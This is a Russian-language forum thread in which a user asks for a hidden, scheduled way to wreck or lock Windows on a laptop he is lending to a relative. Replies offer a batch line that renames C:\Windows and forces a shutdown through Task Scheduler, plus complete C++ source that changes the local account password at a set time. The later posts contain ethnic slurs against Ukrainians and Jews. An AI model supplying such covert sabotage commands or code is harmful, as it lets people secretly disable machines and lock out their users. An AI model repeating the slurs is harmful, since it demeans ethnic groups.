Здравствуйте дорогие товарищи, случилась у меня такая проблема. Одному из моих родственников приспичило уехать с моим ноутбуком а две недели, отказать не могу. Чтобы не обижать родственника хотел бы узнать есть ли у вас уважаемые форумчане на уме какой нибудь софт, который я спрячу, он запустится по расписанию и убьет винду например. Или не убьет а хотя бы покалечит чтобы пользоваться не возможно было без восстановления. Или пускай пароль какой нибудь спросит дня через 2. Или баннер с членом на весь экран, чтобы я его легко смог убрать а посторонний человек нет. Там куда родственник поедет врятле найдется кто нибудь кто винду сможет установить
Не нужен никакой спец.софт, всё делается через запуск в заданное время планировщиком cmd/bat-файла с одной строкой, которая убьёт какой-нибудь системный/загрузочный файл, к примеру. А вообще, нехорошо родственникам такие подлянки делать. Или не слышал про закон бумеранга?
для смены пароля по расписанию. CreateWaitableTimer(...) -> SetWaitableTimer(...) -> WaitForSingleObject(...) -> NetUserChangePassword(...)
зачем ему смена пароля? я хз как в8 убить а так что-то вроде этого в x.bat например ren C:\Windows C:\Findows SHUTDOWN -S -F -T 60 -C "Fatal Error" в панель управления - администрирование - планировщик заданий - добавить там бла бла в выборе что запустить этот бат потом с лайв сиди обратне переименуешь папку виндовс но что-то мне подсказывает что стандартные антивири в8 не дадут папку переименовать, такие как windefend
Вот код, который меняет пассворд по расписанию: Code: #include <windows.h> #include <process.h> #include <lmaccess.h> #include <string> #pragma comment(lib, "Netapi32.lib") struct user_information { HANDLE timer; std::wstring user_name; std::wstring old_password; std::wstring new_password; }; unsigned int __stdcall change_password(void *data) { user_information *user = static_cast<user_information*>(data); WaitForSingleObject(user->timer, INFINITE); NetUserChangePassword(nullptr, user->user_name.c_str(), user->old_password.c_str(), user->new_password.c_str()); return 0; } int main() { SYSTEMTIME system_time = {0}; FILETIME local_file_time = {0}; FILETIME file_time = {0}; LARGE_INTEGER utc_time = {0}; user_information user = {0}; HANDLE timer = CreateWaitableTimer(nullptr, FALSE, nullptr); system_time.wYear = 2013; system_time.wMonth = 5; system_time.wDayOfWeek = 7; system_time.wDay = 17; system_time.wHour = 13; system_time.wMinute = 12; system_time.wSecond = 0; SystemTimeToFileTime(&system_time, &local_file_time); LocalFileTimeToFileTime(&local_file_time, &file_time); utc_time.HighPart = file_time.dwHighDateTime; utc_time.LowPart = file_time.dwLowDateTime; SetWaitableTimer(timer, &utc_time, 0, nullptr, nullptr, FALSE); user.timer = timer; user.user_name = L"Ins3t"; user.old_password = L"old_pass"; user.new_password = L"new_pass"; HANDLE thread = (HANDLE)_beginthreadex(nullptr, 0, change_password, &user, 0, nullptr); WaitForSingleObject(thread, INFINITE); return 0; } Сдед. строки заменить своими данными. А здесь указать время, когда пассворд должен измениться: Так же если у тебя Windows8 и ты логинешься через скайдрайв сразу позаботься о switch to local account, поскольку код меняет пасс локальному юзеру.
хули тут аргументировать? если чувак не знаком даже с батчем, а ты ему апивиндавс функции да потом си сурс суешь который ему нужно будет откомпилить, ты бы ему еще на ассамблере начиркал блеать, и смена пароля это никак не убийство вин, родственник ему потом еще мозги трахать будет зачем пароль поставил на винду. так что иди сам на йух умничка ты наша
а ты походу сей час школу прогуливаешь, да? урок русского языка? написано же, блять: и то, что ты не в состоянии собрать прогу из исходника еще не означает, что ТС такой же. на крайняк я ему и сбилдить могу. а твой бат-шлак на вин8 не работает к стати. и есть у меня подозрение, что и на семерке не заработает, увы нет 7 для теста. так что лучшим вариантом для тебя будет завалить свой хавальник и не спорить со взрослыми дядями, а идти в школу и набираться знаний. а то хватает нам уже bat антивирусов.
ТС - негодяй. Но все же послушай советы Ins3t, он хохол - у них такие западлянки делать получше евреев выходит. Так что думаю тут уважаемый "Харьковчанин" компетентен, как нигде.
у тебя какие то проблемы с ЮА? детская травма, да? наверное обижали в детстве тебя часто, соболезную.